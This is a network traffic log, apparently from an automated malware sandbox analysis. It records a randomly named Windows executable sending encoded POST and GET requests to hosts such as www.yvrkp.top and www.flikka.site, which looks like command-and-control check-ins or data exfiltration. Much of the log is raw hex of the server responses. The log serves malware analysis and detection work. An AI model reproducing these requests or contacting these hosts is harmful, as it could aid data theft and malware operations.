Nov 11, 2024 08:32:34.661974907 CET	1161	IN	Data Raw: ee 45 98 b3 10 69 f1 f0 21 61 82 19 06 9c ea 10 38 f6 d6 2b 1e c3 0c c7 ad 4f bf fe 7c ef 93 9d a7 7b 5d bf 7c 5e 5b 9d 77 a2 50 44 a8 50 b9 4e b0 3f 62 c6 ab 4d ae c9 0b 61 8c d4 8a ac 24 77 70 42 52 cd 0c 42 9a 2e ae 25 91 7d c6 91 8e b1 4f 21 Data Ascii: Ei!a8+O\|{]\|^[wPDPN?bMa$wpBRB.%}O!Mi)%4H/V0}PTI!]KoV%x(cQa:[pw{s/l\|?Vtq\|Em:p&FD!yj:F41}
Nov 11, 2024 08:32:34.884119034 CET	1236	IN	Data Raw: 36 37 62 0d 0a dc 5b db 72 d3 46 18 be 67 86 77 f0 98 73 5a c5 bb 3a ae 1c ea 9b 5e f4 a6 e5 2a ed 0d c3 64 64 ed ba 31 d8 b1 c7 b2 99 70 d1 99 a4 21 4c 42 a1 01 02 94 d8 09 21 75 86 53 9a 94 53 93 00 09 bc 4c 64 c9 57 7d 85 8e 0e 2b af 6c 03 21 Data Ascii: 67b[rFgwsZ:^dd1p!LB!uSSLdW}+l!7IvvmM?3aXmRZz0n^i>Mh{oJ[4F{rGjt:'/Dw=u!u:*0%a#,bjX(0CCzjlh(8
Nov 11, 2024 08:32:34.884130955 CET	430	IN	Data Raw: 3d af af ac d5 cb 15 6b a3 6c 3d 9b ee 51 54 14 b9 fb 26 a2 88 12 14 45 01 c0 8e 50 a9 6d 8d 9b cb 2b e6 e6 76 8f 22 01 85 ee 23 21 00 1e 88 32 40 52 67 48 6c 4e d6 5e fc 61 4e 6d f4 26 12 2a 44 dd f7 54 82 08 24 59 96 3a 44 c2 1a 5b a8 3d 79 61 Data Ascii: =kl=QT&EPm+v"#!2@RgHlN^aNm&*DT$Y:D[=ya=Q@ #Ey>mW{&xlB 3teZ(AP$%APg6OU^3_~>,d>coPaQ^^R U^Jm~}`=h=zeN]
Nov 11, 2024 08:32:35.109405041 CET	1236	IN	Data Raw: 62 32 31 0d 0a ec 5d 5b 4f 1b 49 16 7e 9e 91 e6 3f d4 74 66 63 5b 09 b6 b1 b1 0d 0e 58 ca 6c 14 ed ac e6 61 a5 ac b4 0f 51 34 6a 70 63 f7 4e e3 b6 dc 36 84 5c 24 48 20 5c c2 35 10 ee 04 08 0c 21 21 38 0e 30 dc 7c 41 da df e2 ea cb 13 7f 61 55 7d Data Ascii: b21][OI~?tfc[XlaQ4jpcN6\$H \5!!80\|AaU}suIi07]N:uNbHR{dgh5SUr}:`BS'.N[Z9HfasDNPr($~*SYa9_y~yR}dNR1l[pC%1
Nov 11, 2024 08:32:35.109412909 CET	1236	IN	Data Raw: 1b 4d 47 dd aa 12 21 69 27 81 cf 0a d8 cf 80 de 65 00 e4 32 49 ac 49 15 0a 85 4c 2d a3 79 47 79 dd 78 bb 36 89 83 e8 55 d7 c1 3e a8 6b 65 ef 23 b1 64 00 2a 3d d9 dd 38 39 7f 44 a0 cf 8b 19 dd cb 20 94 fc fc dc 1a 1b 2c 0c ae 50 01 f4 73 9e a2 79 Data Ascii: MG!i'e2IIL-yGyx6U>ke#d*=89D ,Psy5^9`lFATIZCSSOQ7j'8D.@bZ/6!A_d#fAt,1?33cb{njs30PPy)(
Nov 11, 2024 08:32:35.109419107 CET	406	IN	Data Raw: d2 64 2a 7d 13 9d c5 e4 5e fd 94 48 53 31 2a 15 06 b0 d0 03 df 3c 57 06 43 58 e8 53 7a 78 56 18 29 e7 c7 80 57 2d 45 0a 80 4f bd 12 6d 1e 47 c7 49 bb 31 56 c4 af 1a 63 ad e2 9d 24 45 45 c3 20 e0 f5 9a c4 e9 e0 54 a5 91 66 f7 a5 85 69 7e f6 40 9a Data Ascii: d}^HS1<WCXSzxV)W-EOmGI1Vc$EE Tfi~@aA yE~z]e&h?OW0%QC+:=]Q0F7k#"}I@4Efba}]`:7>M`Gu*DUQUC+2H)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50021	104.21.14.183	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:36.294193983 CET	10883	OUT	POST /9jdk/ HTTP/1.1 Host: www.yvrkp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.yvrkp.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.yvrkp.top/9jdk/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 62 73 7a 54 77 38 42 4b 32 62 47 4d 55 70 35 34 31 41 44 7a 7a 33 6c 41 71 4f 2b 52 5a 52 30 39 43 67 47 56 31 38 30 43 31 76 76 72 76 64 75 44 2b 43 33 49 46 69 2b 56 58 61 66 56 38 7a 45 2b 73 36 44 44 59 31 68 57 56 72 6e 66 54 37 2f 78 75 66 6b 31 45 31 77 35 52 74 62 5a 50 4f 57 65 65 64 7a 66 77 38 32 4b 6c 50 68 62 53 31 65 45 6d 6a 41 47 74 78 58 39 2f 6f 59 6a 62 7a 79 46 58 42 48 5a 75 2f 6d 72 58 6c 77 2f 2f 30 7a 2f 74 4f 67 47 46 47 68 44 41 70 54 32 62 62 37 45 6c 47 6d 62 4a 49 6e 54 50 69 2b 2b 30 68 4a 62 57 61 50 30 5a 76 6f 54 56 37 41 64 6e 76 46 55 6e 74 6e 31 66 31 75 50 7a 73 5a 71 41 30 6c 5a 77 36 57 76 71 76 67 47 38 6b 36 63 32 49 54 30 77 55 71 6d 2f 6a 6f 76 37 6c 75 70 45 34 4f 39 4f 65 50 58 35 4b 72 5a 4e 4e 48 6b 4b 7a 33 50 6d 64 69 71 79 73 6d 70 34 6f 6d 4b 7a 48 32 47 6d 6f 62 72 4a 67 76 57 42 38 2b 73 69 71 68 41 78 51 52 79 30 4d 38 72 34 36 45 78 50 4d 38 66 64 47 55 4d 77 49 76 65 4f 54 58 39 6f 2b 61 68 62 6c 53 79 55 56 43 62 37 74 51 [TRUNCATED] Data Ascii: Ir8HUj=bszTw8BK2bGMUp541ADzz3lAqO+RZR09CgGV180C1vvrvduD+C3IFi+VXafV8zE+s6DDY1hWVrnfT7/xufk1E1w5RtbZPOWeedzfw82KlPhbS1eEmjAGtxX9/oYjbzyFXBHZu/mrXlw//0z/tOgGFGhDApT2bb7ElGmbJInTPi++0hJbWaP0ZvoTV7AdnvFUntn1f1uPzsZqA0lZw6WvqvgG8k6c2IT0wUqm/jov7lupE4O9OePX5KrZNNHkKz3Pmdiqysmp4omKzH2GmobrJgvWB8+siqhAxQRy0M8r46ExPM8fdGUMwIveOTX9o+ahblSyUVCb7tQYz6TMgQRgpBU0PDVzJrJIeWWOfZs9JVyolUHKJezSYUA956sBG6RZ8MmJrsPsizBaG8LAaln5S0ifBBPyq4VBeYMr57EvVKIpWdzLMhzTFgMVjm1nwIFYGJle77MwRX/HVeeBUZmhmNag6rAvCCywVEI6AAWsi+TQb579kOkAGzb+8TovB83JHBFqchtgBoYUGNqLy/hglp2dGWL9CaiKLw8lMucdPbFi5UANqYCAtsso6zjvFDXQVXj6V+l+ism/9ZcgKGyV4FZqWS2ORifjYUbA2JKwYyn/3YYBUw4KVkGRrXm53e4f80TVEJh2yl3+/LyRrM6IgcmQlS48gwAx8L0HpmlmpVCL5Mv1j8h5p2MxDYp53gEgMxokaCHeMu8nYXKpo4sfQk2sDXRFAqtDpyuOoPGT1THhaR4HlBLhI0DmrONV99YITaB6nm0VGRtJVbx0m9bddujXo5jweYKBHQlmZUNEme9irq9bD0y7AX8gJxi7BXAjWvKjmtSxg7wvdYp9r0kTTxHeUd26J83Tu56DcyLDv5ZVGJRNdBFYHC4VLFQd7dwCT/xVxf9TOmWviv+Kc91468/rXERs5jYca9AySSazFKiauybnnz0mculgLGpNdpFoM39HampT6JnaGeMh0xYywrA7f9ouErtcT2bLkpHW6bDiT [TRUNCATED]
Nov 11, 2024 08:32:37.275301933 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 07:32:37 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: private X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Frame-Options: SAMEORIGIN Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2c%2FiJWGqlFVhk84B5lluHZjLfh74nFR2q%2FsCVa8o%2F80WbXjIlOfpH9WEFgjzL6eZvt%2BuGUEV19AMshtWzW%2BTkhlHWNAcpfm4r1P2PIG73mJXKbkW73hOLGuegWjyHUh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0c96e11cd7c334-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1254&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10883&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 4d 6f db 46 10 3d db 80 ff c3 86 41 91 04 e8 8a b2 1c 37 09 23 19 4d 1d bb 4d 3f f2 81 d8 45 7b 32 46 e4 48 5c 6b b9 cb ec 2e 29 cb 41 80 1e 0b 14 3d e4 92 a2 40 7a 68 0f 3d f5 da 5b d1 7f 13 03 f9 17 c5 92 94 bc 94 28 db 45 9c 56 17 92 b3 fb de cc be 99 9d 25 d5 bd 72 ff d1 f6 de b7 8f 77 48 6c 12 be b5 b6 da b5 57 12 72 d0 ba e7 1d 6a 12 6a 0d 82 25 60 98 14 da db 5a 5b 5d e9 c6 08 91 9d 99 a0 01 12 1b 93 52 7c 96 b1 bc e7 6d 4b 61 50 18 ba 37 49 d1 23 61 f9 d4 f3 0c 1e 19 df d2 de 25 61 0c 4a a3 e9 ed ef ed d2 db 96 8d 90 45 9a 6f e8 fe 3d ba 2d 93 14 0c eb 73 97 e9 c1 4e 0f a3 21 ba 40 01 09 f6 bc 08 75 a8 58 6a 83 74 a6 2f ce 1b e1 64 2c 55 a4 cf 9c 94 33 1c a7 52 19 67 d2 Data Ascii: 57bXMoF=A7#MM?E{2FH\k.)A=@zh=[(EV%rwHlWrjj%`Z[]R\|mKaP7I#a%aJEo=-sN!@uXjt/d,U3Rg
Nov 11, 2024 08:32:37.275324106 CET	1164	IN	Data Raw: 98 45 26 ee 45 98 b3 10 69 f1 f0 21 61 82 19 06 9c ea 10 38 f6 d6 2b 1e c3 0c c7 ad 4f bf fe 7c ef 93 9d a7 7b 5d bf 7c 5e 5b 9d 77 a2 50 44 a8 50 b9 4e b0 3f 62 c6 ab 4d ae c9 0b 61 8c d4 8a ac 24 77 70 42 52 cd 0c 42 9a 2e ae 25 91 7d c6 91 8e Data Ascii: E&Ei!a8+O\|{]\|^[wPDPN?bMa$wpBRB.%}O!Mi)%4H/V0}PTI!]KoV%x(cQa:[pw{s/l\|?Vtq\|Em:p&FD!yj:F41
Nov 11, 2024 08:32:37.508821011 CET	1236	IN	Data Raw: 36 38 39 0d 0a dc 5b db 52 13 49 18 be b7 ca 77 48 c5 33 bb c3 74 cf b9 83 cb cd 5e ec d5 7a c5 5e 59 16 35 99 c3 12 4d 48 2a 07 0b 2f b6 0a 16 45 40 5d 15 4f 6b 80 55 d0 5a 70 57 d8 60 a1 46 04 7d 19 66 26 b9 da 57 d8 ea 99 e9 49 4f 12 04 19 31 Data Ascii: 689[RIwH3t^z^Y5MH/E@]OkUZpW`F}f&WIO1d:==_;YGg^^)5giuRH?0t{#ZakFFMu5aF9=Q\>[44\|1Y4^:aP j;`\|H
Nov 11, 2024 08:32:37.508831024 CET	444	IN	Data Raw: 5b e8 00 fd 16 ea 48 f4 c0 d6 c2 11 6b e1 a0 c0 09 90 87 8a 18 2d 7a d4 67 1f d7 e7 17 ed ca 33 6b 71 da 79 35 65 cf bc ea 56 83 e1 3b 6f 30 0a 44 40 86 48 e0 23 41 b2 5d 1d b5 5f 2e d8 a3 4b 9e 03 b3 a6 9f 5a bf 95 ed eb 33 db 1b 1b 11 5d da 6e Data Ascii: [Hk-zg3kqy5eV;o0D@H#A]_.KZ3]n6h{^QCMg}O{s;BpEJyUxZ_MYoINL! k]YlUGve\|w =$P5FBue?AD\fm-:WGM
Nov 11, 2024 08:32:37.744190931 CET	1236	IN	Data Raw: 62 36 34 0d 0a ec 5d 5b 6f db 46 16 7e 6e 81 fe 87 29 db 8d 24 24 ba 5b be 28 b6 80 74 8b 62 0b f4 a1 40 b0 d8 87 20 28 64 8b 96 b8 4b 8b 82 48 c5 4d 9b 02 6a e2 38 f2 45 b1 93 28 be ca b1 8d c4 8e 52 5f a4 38 ae 24 5b 8a 0d ec 5f a9 66 48 3e e5 Data Ascii: b64][oF~n)$$[(tb@ (dKHMj8E(R_8$[_fH>/,7&X5PDs93sxfO2+)NGiLwH\|kc`cxIruZN%S5G>m"/N3!'$I+S>Oci{x"17<]xP
Nov 11, 2024 08:32:37.744204044 CET	1236	IN	Data Raw: be a3 9a 82 dd 6b 85 4e d5 91 0d 09 4e c6 8a 52 32 f4 e4 22 7d 4e 77 2c 76 32 e2 dd 57 5f 7d 65 02 43 d3 3a 94 08 1a a0 d5 74 39 62 46 91 0d 50 65 52 b2 74 bb 4c 6d a6 ab ab eb aa 15 1c 9a 0f a3 b1 69 38 5f 1d 22 a4 ec 24 08 58 41 09 1a f0 c2 0c Data Ascii: kNNR2"}Nw,v2W_}eC:t9bFPeRtLmi8_"$XA`&UzzzL-yvmR{=\| z6/f<1P5Y\|FI/pGk'W\|ZUDR9Mg'"M/ HUU+h/W8%C9.i`im@YvL
Nov 11, 2024 08:32:37.744214058 CET	424	IN	Data Raw: 1b c2 83 5f e0 64 49 cc de 85 87 05 b9 ba b8 b5 00 0f 37 8d 55 64 9b 1e 06 ad 7a 5e 5f e1 5d 73 5a e6 22 d7 69 d5 0f 65 16 fc d2 18 2a 66 f1 c9 91 74 ff 5d 73 5a 6c 2c 08 bb 2f 5a f5 43 89 93 7e cd 61 b9 68 9a bb 86 7d 31 a9 57 5f 27 39 32 4e a6 Data Ascii: _dI7Udz^_]sZ"ie*ft]sZl,/ZC~ah}1W_'92N6<wV!)XS/';i7cV"X\|>8#4T@Uq~bedWXKRrG:+s8[{<1x:&cuD-Iu(~rF`3:7[o(GD>V4
Nov 11, 2024 08:32:37.744223118 CET	49	IN	Data Raw: 07 4b 33 a3 0e 17 f8 c9 25 81 e8 4a 1f 7a b9 a4 ef b1 8a fc 0f 00 00 ff ff 0d 0a 63 0d 0a e3 e5 02 00 92 94 ec 46 38 6b 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: K3%JzcF8k0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50022	104.21.14.183	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:38.834503889 CET	530	OUT	GET /9jdk/?Ir8HUj=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.yvrkp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:32:39.842067957 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 07:32:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: private X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Frame-Options: SAMEORIGIN Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ifvcNU7VD4wPTDQueiTRA4%2BTsPqP10dy%2BNWWpmW6W7v%2BTM%2FBJr7Q%2B1tdNQ1yIJBbXrLPwzbtVA3VkSD4PxcQbuUHf2gKg4M4qpHEoSDR67cJdmQobI08nGIj2ZXoANll"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0c96f11dafa26d-YUL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11548&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 30 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6a 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 Data Ascii: 130d<!DOCTYPE html><html class="js cssanimations"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="description" content=""> <meta name="keywords" content=""> <me
Nov 11, 2024 08:32:39.842089891 CET	1236	IN	Data Raw: 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 47 56 4a 54 42 45 Data Ascii: ta name="viewport" content="width=device-width, initial-scale=1"> <title>GVJTBEST</title> <meta name="renderer" content="webkit"> <meta http-equiv="Cache-Control" content="no-siteapp"> <meta name="mobile-web-app-capable" conten
Nov 11, 2024 08:32:39.842102051 CET	1236	IN	Data Raw: 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 7a 79 2d 74 77 2e 6f 73 73 2d 61 63 63 65 6c 65 72 61 74 65 2e 61 6c 69 79 75 6e 63 73 2e 63 6f 6d 2f 2f 74 65 6d 70 6c 61 74 65 73 2f Data Ascii: "></script> <script src="https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js"></script><style type="text/css"> .cus-header { position: fixed; top: 0; z-index: 6; height: 49px;
Nov 11, 2024 08:32:39.842113972 CET	1236	IN	Data Raw: 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 61 6d 2d 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 30 3b 0d 0a 20 20 20 Data Ascii: hidden; } .am-header { position: fixed; top: 0; z-index: 10; height: 49px; line-height: 49px; padding: 0 10px; } .am-header-default { background-color: #fff
Nov 11, 2024 08:32:39.842154980 CET	904	IN	Data Raw: 73 73 3d 22 63 61 6e 76 69 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 69 63 6f 6e 2d 77 72 61 70 70 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 7a 79 2d 74 77 Data Ascii: ss="canvi-navigation__icon-wrapper"> <img src="https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png" alt="" style="width: 30px;"> </span> <span class="canvi-navigation_
Nov 11, 2024 08:32:40.108774900 CET	1236	IN	Data Raw: 32 39 36 37 0d 0a e7 89 a9 e6 b5 81 e6 a2 9d e6 ac be 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 09 09 09 20 3c 6c 69 3e 20 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2f 74 68 2e 68 74 6d 6c 22 3e e9 80 80 e6 8f 9b e6 94 bf e7 ad 96 3c 2f 61 3e 3c 2f 6c Data Ascii: 2967</a></li> <li> <a href="/about/th.html"></a></li> <li> <a href="/about/ys.html"></a></li> <li> <a href="/about/lxwm.html"></a></li> </ul>
Nov 11, 2024 08:32:40.108794928 CET	1236	IN	Data Raw: 8d e5 8b 99 e6 99 82 e9 96 93 ef bc 9a 28 55 54 43 2f 47 4d 54 2b 30 38 3a 30 30 29 3c 62 72 3e 39 3a 30 30 2d 31 38 3a 30 30 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f Data Ascii: (UTC/GMT+08:00)<br>9:00-18:00</span> </span> </li> </ul> <div style="border-bottom: 1px dashed #dcdcdc;"></div></aside><div class="cus-header"> <span class="js-canvi-open-button--left
Nov 11, 2024 08:32:40.108805895 CET	1236	IN	Data Raw: 20 20 20 68 65 69 67 68 74 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 35 70 78 20 31 30 70 78 20 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 Data Ascii: height: 250px; margin: 0 5px 10px 5px; padding-top: 10px; display: flex; flex-direction: column; background-color: white; border-radius: 10px;}.sp_img { display: flex; flex-direction: column;
Nov 11, 2024 08:32:40.108818054 CET	1236	IN	Data Raw: 73 73 3d 27 73 70 5f 69 6d 67 27 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 7a 79 2d 74 77 2e 6f 73 73 2d 61 63 63 65 6c 65 72 61 74 65 2e 61 6c 69 79 75 6e 63 73 2e 63 6f 6d 2f 75 70 6c Data Ascii: ss='sp_img'> <img src="https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111441491430.jpg" alt="" > </div> <div class='sp_name'></div> <div class='sp_price'> N
Nov 11, 2024 08:32:40.108829975 CET	848	IN	Data Raw: 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 7a 79 2d 74 77 2e 6f 73 73 2d 61 63 63 65 6c 65 72 61 74 65 2e 61 6c 69 79 75 6e 63 73 2e 63 6f 6d 2f 75 70 6c 6f 61 64 2f 32 30 32 33 31 30 2f 31 31 2f 32 30 32 33 31 30 31 31 31 33 35 32 32 39 30 32 36 39 2e Data Ascii: c="https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111352290269.jpg" alt="" > </div> <div class='sp_name'></div> <div class='sp_price'> NT$998.00
Nov 11, 2024 08:32:40.109050989 CET	1236	IN	Data Raw: 63 6f 6d 2f 75 70 6c 6f 61 64 2f 32 30 32 33 31 30 2f 31 32 2f 32 30 32 33 31 30 31 32 31 30 34 30 35 31 35 36 30 33 2e 6a 70 67 22 20 61 6c 74 3d 22 22 20 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 Data Ascii: com/upload/202310/12/202310121040515603.jpg" alt="" > </div> <div class='sp_name'>NOVO</div> <div class='sp_price'> NT$998.00  <del>NT$1000.00</del> </div> <

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50023	67.223.117.142	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:45.508449078 CET	787	OUT	POST /brrb/ HTTP/1.1 Host: www.flikka.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.flikka.site Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.flikka.site/brrb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 43 63 70 5a 64 6c 68 6d 36 35 45 6a 69 62 53 61 41 41 4a 45 35 35 46 74 51 71 48 31 64 31 79 59 67 5a 6e 48 53 4f 6c 55 78 67 58 47 67 4e 52 47 45 6a 6d 6d 50 70 65 61 6d 32 6b 46 59 75 70 6a 74 62 6a 45 67 79 42 6b 61 68 59 6f 46 6b 54 47 76 70 32 70 55 53 31 54 55 6b 70 32 57 69 6e 44 2f 51 57 45 58 36 35 45 7a 50 79 75 55 4c 79 70 6e 69 6d 5a 36 6d 54 66 4c 6a 4e 48 54 42 78 6a 5a 6f 49 34 61 2f 4a 66 32 48 6e 66 69 4b 50 59 34 43 37 5a 4c 76 6c 68 77 77 62 41 73 36 4f 37 4c 2b 77 54 36 4c 46 31 6b 39 46 38 76 71 75 78 71 48 6a 71 30 77 3d 3d Data Ascii: Ir8HUj=Cw0Zy0LVBM79CcpZdlhm65EjibSaAAJE55FtQqH1d1yYgZnHSOlUxgXGgNRGEjmmPpeam2kFYupjtbjEgyBkahYoFkTGvp2pUS1TUkp2WinD/QWEX65EzPyuULypnimZ6mTfLjNHTBxjZoI4a/Jf2HnfiKPY4C7ZLvlhwwbAs6O7L+wT6LF1k9F8vquxqHjq0w==
Nov 11, 2024 08:32:46.106987953 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:32:46 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 